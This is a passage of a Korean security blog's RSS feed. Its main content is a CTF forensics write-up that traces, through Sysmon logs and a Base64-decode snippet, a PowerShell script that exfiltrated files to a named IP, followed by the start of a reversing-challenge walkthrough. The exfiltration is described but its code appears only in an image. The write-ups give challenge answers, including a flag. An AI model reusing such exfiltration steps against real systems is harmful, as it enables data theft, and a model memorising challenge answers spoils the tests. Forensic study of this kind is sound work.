&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;15. AWS Certified Cloud Practitioner certificate.PNG&quot; data-origin-width=&quot;894&quot; data-origin-height=&quot;685&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/GQsF3/btsGdqLTNtF/58UeKqtLpGzQLOT9aVQe2k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/GQsF3/btsGdqLTNtF/58UeKqtLpGzQLOT9aVQe2k/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/GQsF3/btsGdqLTNtF/58UeKqtLpGzQLOT9aVQe2k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FGQsF3%2FbtsGdqLTNtF%2F58UeKqtLpGzQLOT9aVQe2k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;474&quot; height=&quot;363&quot; data-filename=&quot;15. AWS Certified Cloud Practitioner certificate.PNG&quot; data-origin-width=&quot;894&quot; data-origin-height=&quot;685&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;참고로 새로운 AWS 자격을 취득하면&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;기존에 취득했던 하위 자격증의 유효기간이 더 늘어나게 된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;유효기간이 3년이니 2027년 되기 전에 다음 AWS를 노려보려고 한다.&lt;/p&gt;</description>
      <category>자격증/IT&amp;middot;전산&amp;middot;보안</category>
      <category>AWS</category>
      <category>AWS Solution Architect</category>
      <category>AWS자격증</category>
      <category>공부</category>
      <category>자격증</category>
      <category>정보보안</category>
      <category>정보보호</category>
      <category>취업</category>
      <category>해킹</category>
      <category>해킹대회</category>
      <author>SecurityMan</author>
      <guid isPermaLink="true">https://hackingstudypad.tistory.com/721</guid>
      <comments>https://hackingstudypad.tistory.com/721#entry721comment</comments>
      <pubDate>Thu, 4 Apr 2024 11:00:29 +0900</pubDate>
    </item>
    <item>
      <title>[2022 화이트햇 콘테스트 본선] E-5- 포렌식 / Sysmon View / Powershell</title>
      <link>https://hackingstudypad.tistory.com/720</link>
      <description>&lt;pre id=&quot;code_1711433722523&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;[E-5]
공격자가 가장 첫번째로 유출한 파일의 SHA1 해시는?&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;2022 화이트햇 콘테스트 본선에 출제되었던 문제&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;이전 E-4 문제와 이어지는 문제이다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;(&lt;a href=&quot;https://hackingstudypad.tistory.com/699&quot;&gt;https://hackingstudypad.tistory.com/718&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;)&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;정신을 어디 뒀었는지&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;이번 문제화면도 역시 캡쳐를 못했다..&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;넘 아쉬운 부분..&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;revenue_unit_wrap&quot;&gt;
  &lt;div class=&quot;revenue_unit_item adsense responsive&quot;&gt;
    &lt;div class=&quot;revenue_unit_info&quot;&gt;반응형&lt;/div&gt;
    &lt;script src=&quot;//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js&quot; async=&quot;async&quot;&gt;&lt;/script&gt;
    &lt;ins class=&quot;adsbygoogle&quot; style=&quot;display: block;&quot; data-ad-host=&quot;ca-host-pub-9691043933427338&quot; data-ad-client=&quot;ca-pub-6369827649108732&quot; data-ad-format=&quot;auto&quot;&gt;&lt;/ins&gt;
    &lt;script&gt;(adsbygoogle = window.adsbygoogle || []).push({});&lt;/script&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1233&quot; data-origin-height=&quot;740&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/z8rU9/btsF7wqgi35/vyo5koOark4mvxVH99Rw71/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/z8rU9/btsF7wqgi35/vyo5koOark4mvxVH99Rw71/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/z8rU9/btsF7wqgi35/vyo5koOark4mvxVH99Rw71/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fz8rU9%2FbtsF7wqgi35%2Fvyo5koOark4mvxVH99Rw71%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1233&quot; height=&quot;740&quot; data-origin-width=&quot;1233&quot; data-origin-height=&quot;740&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Sysmon View 도구를 이용해&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;피해 윈도우 이미지의 sysmon 로그를 분석하다보면&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;powershell 실행기록 중 PID 가 4564인 로그를 찾을 수 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;BASE64 인코딩된 명령어가 실행되었는데&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;pre id=&quot;code_1711434174233&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;$base64EncodedString = &quot;여기에_Base64_문자열_입력&quot;; 
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64EncodedString))&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;위와 같은 파워쉘 스크립트로 디코딩을 할 수 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;841&quot; data-origin-height=&quot;118&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bkrNhA/btsF7ZZReh9/4cbbXYaV3D9VND6SjTACqK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bkrNhA/btsF7ZZReh9/4cbbXYaV3D9VND6SjTACqK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bkrNhA/btsF7ZZReh9/4cbbXYaV3D9VND6SjTACqK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbkrNhA%2FbtsF7ZZReh9%2F4cbbXYaV3D9VND6SjTACqK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;841&quot; height=&quot;118&quot; data-origin-width=&quot;841&quot; data-origin-height=&quot;118&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;디코딩을 해보면 이런 Powershell 스크립트가 나온다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;52.78.113.15를 목적지로&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;.png, .gif, .jpg 와 같은 특정 확장자를 가진 파일을 업로드하고 있는 모습이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;확장자가 굉장히 많은데&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이중에서 어떤 확장자를 가진 파일을 가장 먼저 가져왔을까를 알아내야 한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;868&quot; data-origin-height=&quot;172&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/XnCD6/btsF7v5YV75/V4AWzSDhFDojenraRfoSgk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/XnCD6/btsF7v5YV75/V4AWzSDhFDojenraRfoSgk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/XnCD6/btsF7v5YV75/V4AWzSDhFDojenraRfoSgk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FXnCD6%2FbtsF7v5YV75%2FV4AWzSDhFDojenraRfoSgk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;868&quot; height=&quot;172&quot; data-origin-width=&quot;868&quot; data-origin-height=&quot;172&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;그냥 단순하게 침해사고 이미지에 들어가서&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Powershell 창을 열어 똑같이 실행시켜 봤다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;그리고나서 $a 에 들어간 값을 확인했더니&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Eula.txt 파일이 가장 먼저 보였다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;848&quot; data-origin-height=&quot;89&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/WyMO1/btsF3U0iF4n/CkXsQWWIID49MKEkAJzjk0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/WyMO1/btsF3U0iF4n/CkXsQWWIID49MKEkAJzjk0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/WyMO1/btsF3U0iF4n/CkXsQWWIID49MKEkAJzjk0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FWyMO1%2FbtsF3U0iF4n%2FCkXsQWWIID49MKEkAJzjk0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;848&quot; height=&quot;89&quot; data-origin-width=&quot;848&quot; data-origin-height=&quot;89&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Certutil 명령어를 이용해서&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 파일의 SHA1 해시값을 구해준뒤 제출했다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이번 문제의 플래그는&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;FLAG{5ab806618497189342722d42dc382623ac3e1b55} 가 된다.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;</description>
      <category>CTF/포렌식</category>
      <category>CTF</category>
      <category>forensics</category>
      <category>PowerShell</category>
      <category>sysmonview</category>
      <category>워게임</category>
      <category>정보보안</category>
      <category>정보보호</category>
      <category>포렌식</category>
      <category>해킹</category>
      <category>해킹대회</category>
      <author>SecurityMan</author>
      <guid isPermaLink="true">https://hackingstudypad.tistory.com/720</guid>
      <comments>https://hackingstudypad.tistory.com/720#entry720comment</comments>
      <pubDate>Sat, 30 Mar 2024 11:00:41 +0900</pubDate>
    </item>
    <item>
      <title>[SuNiNaTaS] Challenge11 - 리버싱 / Ollydbg</title>
      <link>https://hackingstudypad.tistory.com/719</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;192&quot; data-origin-height=&quot;114&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/7bKGb/btsF3cTPBhZ/l9fB6f7W829NV8K8ikmQ3k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/7bKGb/btsF3cTPBhZ/l9fB6f7W829NV8K8ikmQ3k/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/7bKGb/btsF3cTPBhZ/l9fB6f7W829NV8K8ikmQ3k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F7bKGb%2FbtsF3cTPBhZ%2Fl9fB6f7W829NV8K8ikmQ3k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;192&quot; height=&quot;114&quot; data-origin-width=&quot;192&quot; data-origin-height=&quot;114&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;SuNiNaTaS 에서 제공하는 열한번째 문제&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;리버싱으로 분류된 문제이다.&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;revenue_unit_wrap&quot;&gt;
  &lt;div class=&quot;revenue_unit_item adsense responsive&quot;&gt;
    &lt;div class=&quot;revenue_unit_info&quot;&gt;반응형&lt;/div&gt;
    &lt;script src=&quot;//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js&quot; async=&quot;async&quot;&gt;&lt;/script&gt;
    &lt;ins class=&quot;adsbygoogle&quot; style=&quot;display: block;&quot; data-ad-host=&quot;ca-host-pub-9691043933427338&quot; data-ad-client=&quot;ca-pub-6369827649108732&quot; data-ad-format=&quot;auto&quot;&gt;&lt;/ins&gt;
    &lt;script&gt;(adsbygoogle = window.adsbygoogle || []).push({});&lt;/script&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;108&quot; data-origin-height=&quot;37&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/byhvKx/btsF4VqrUrj/ByQ1bSm9emOjcTkQsgMJtk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/byhvKx/btsF4VqrUrj/ByQ1bSm9emOjcTkQsgMJtk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/byhvKx/btsF4VqrUrj/ByQ1bSm9emOjcTkQsgMJtk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbyhvKx%2FbtsF4VqrUrj%2FByQ1bSm9emOjcTkQsgMJtk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;108&quot; height=&quot;37&quot; data-origin-width=&quot;108&quot; data-origin-height=&quot;37&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;문제에서 주어지는 것은&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Project1.exe 파일이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;272&quot; data-origin-height=&quot;89&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bMmJhH/btsF2Fa1ZTD/LyM9zgSgTwhqtSJjxEMl0k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bMmJhH/btsF2Fa1ZTD/LyM9zgSgTwhqtSJjxEMl0k/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bMmJhH/btsF2Fa1ZTD/LyM9zgSgTwhqtSJjxEMl0k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbMmJhH%2FbtsF2Fa1ZTD%2FLyM9zgSgTwhqtSJjxEMl0k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;272&quot; height=&quot;89&quot; data-origin-width=&quot;272&quot; data-origin-height=&quot;89&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;실행시켜보면&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이렇게 Key 값을 찾으라는 문구와 함께&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;입력창이 있는 프로그램이 뜬다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1912&quot; data-origin-height=&quot;997&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/n4b9U/btsF57KAxZW/WUzKAos4uYqQwkMQBkWw7K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/n4b9U/btsF57KAxZW/WUzKAos4uYqQwkMQBkWw7K/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/n4b9U/btsF57KAxZW/WUzKAos4uYqQwkMQBkWw7K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fn4b9U%2FbtsF57KAxZW%2FWUzKAos4uYqQwkMQBkWw7K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1912&quot; height=&quot;997&quot; data-origin-width=&quot;1912&quot; data-origin-height=&quot;997&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 프로그램을 분석하기 위해&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;올리디버거를 이용해 해당 프로그램을 열어주었다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;575&quot; data-origin-height=&quot;635&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/mz4ZA/btsF5vLXPoB/whlKgUzdiuT6pXk0Ng4po0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/mz4ZA/btsF5vLXPoB/whlKgUzdiuT6pXk0Ng4po0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/mz4ZA/btsF5vLXPoB/whlKgUzdiuT6pXk0Ng4po0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fmz4ZA%2FbtsF5vLXPoB%2FwhlKgUzdiuT6pXk0Ng4po0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;575&quot; height=&quot;635&quot; data-origin-width=&quot;575&quot; data-origin-height=&quot;635&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;우선 가장 먼저&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;우클릭 - Search for - All referenced text strings 를 눌러서&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;스트링을 살펴보았다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;764&quot; data-origin-height=&quot;167&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/c3OEh9/btsF55lGWyr/REl5oaOBtL1EJWkfshumN0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/c3OEh9/btsF55lGWyr/REl5oaOBtL1EJWkfshumN0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/c3OEh9/btsF55lGWyr/REl5oaOBtL1EJWkfshumN0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fc3OEh9%2FbtsF55lGWyr%2FREl5oaOBtL1EJWkfshumN0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;764&quot; height=&quot;167&quot; data-origin-width=&quot;764&quot; data-origin-height=&quot;167&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;그랬더니&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Congratulation! , Authkey : 라는 글자가 보였고&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;그 근처에서&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2V, XS, B6, H1, 0F 가 적혀있는것이 보였다.&lt;/p&gt;
